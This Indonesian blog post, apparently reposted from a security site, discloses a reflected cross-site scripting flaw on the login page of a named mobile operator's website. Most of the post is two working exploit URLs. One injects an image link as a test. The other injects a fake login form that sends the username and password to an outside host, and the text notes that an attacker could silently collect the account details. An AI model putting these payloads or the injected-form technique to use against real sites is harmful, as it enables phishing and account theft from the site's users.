Jumat, 24 September 2010

SMART TELECOM Vulnerable to XSS

SMART merupakan Operator jaringan seluler CDMA di pulau Jawa. Website resminya (http://smart-telecom.co.id/) berisi informasi pengaturan modem dan WAP, layanan informasi tagihan dan registrasi.

Saya mendapati kelemahan Cross Site Scripting (XSS) pada halaman login SMART yang memungkinkan pihak-pihak yang tidak bertanggung jawab memanfaatkan kelemahan tersebut untuk tujuan penipuan dan melakukan pembajakan sesi (session hijacking).

Exploit

//~ Xss Test

view sourceprint?
1http://smart-telecom.co.id/login_page.php?error=%3Ca%20href=%22http://www.spyrozone.net%22%3E%3Cimg%20border=%220%22%20src=%22http://spyrozone.net/sz/www.spyrozone.net_109x63.gif%22%20alt=%22www.spyrozone.net%20-%20Hacking%20and%20Computer%20Security%20Resources%22%3E%3C/a%3E

Screenshot:

XSS test

XSS test


//~ Fake Login

view sourceprint?
1http://smart-telecom.co.id/login_page.php?error=%3C/form%3E%3Cform%20action=%22http://www.spyrozone.net%22%20method=%22post%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3EUser%20Name:%3C/td%3E%3Ctd%3E%3Cinput%20type=%22text%22%20name=%22username%22%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3EPassword:%3C/td%3E%3Ctd%3E%3Cinput%20type=%22password%22%20name=%22password%22%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3E%3C/td%3E%3Ctd%3E%3Cinput%20type=%22submit%22%20name=%22submit%22%20value=%22Login%22%3E%3C/td%3E%3C/tr%3E%3C/table%3E%3C/form%3E%3Cnoscript%3E

Screenshot:

Fake login

Fake login

Jika tombol login di klik, korban akan diredirect ke www.spyrozone.net. Dengan sedikit kreatifitas, attacker bisa mencuri informasi akun yang dimasukkan ke server attacker secara background.

Sumber : http://www.spyrozone.net/hacking/2010/08/smart-telecom-vulnerable-to-xss.jsp

Diposting oleh MORE LIVE! di 06.02

0 komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)
SOTW © 2008 Template by:
SkinCorner